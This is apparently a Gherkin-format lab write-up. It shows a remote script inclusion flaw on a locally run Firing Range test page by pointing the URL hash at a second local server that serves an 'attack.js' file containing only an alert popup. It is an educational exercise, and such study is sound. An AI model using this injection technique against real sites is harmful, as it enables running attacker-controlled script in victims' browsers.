# language: en

Feature: Remote Inclusion - Script - Hash
  From the Firing Range system

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 18.06.0-ce, build 26399
    And also using Safari Version 11.1.2 (13605.3.8)
    And installed firing-range locally
    Given the following scenario
    """
    URL: http://localhost:8080/remoteinclude/script_hash.html#
    https://google.com
    Message: This class of tests simply takes the URL and uses it as the source
    of the inclusion.
    Details:
      - Remote Inclusion - SCRIPT - Hash Page
      - Page in blank
    Objective: Show the Remote inclusion vulnearbility on the page.
    """

    Scenario: Remote inclusion attempt
    Given I am running MAMP to run a web page on port 80:90
    When I create a new js document 'attack.js' with the following code
    """
    alert('I\'m a diferent js');
    """
    And I replace the url 'q' parameter by the following
    """
    #http://localhost:8090/attack.js
    """
    And reloaded the page with the new parameter
    Then the page was reloaded and the popup appeared with 'I'm a diferent js'
    And on the js document was loaded and added to the page
